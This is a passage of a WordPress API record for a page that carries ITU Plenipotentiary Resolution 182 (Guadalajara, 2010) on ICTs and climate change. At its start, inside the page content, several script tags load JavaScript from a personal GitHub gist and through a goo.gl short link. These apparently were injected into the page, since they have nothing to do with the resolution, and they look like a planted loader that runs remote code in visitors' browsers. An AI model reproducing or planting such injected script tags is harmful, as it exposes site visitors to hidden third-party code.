src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 182 (Guadalajara, 2010) The role of telecommunications\/information and communication technologies in regard to climate change and the protection of the environment The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010), recognizing a) Resolution 136 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on the use of telecommunications and information and communication technologies (ICTs) [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1427,"menu_order":182,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-674","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/674","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=674"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/674\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1427"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=674"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}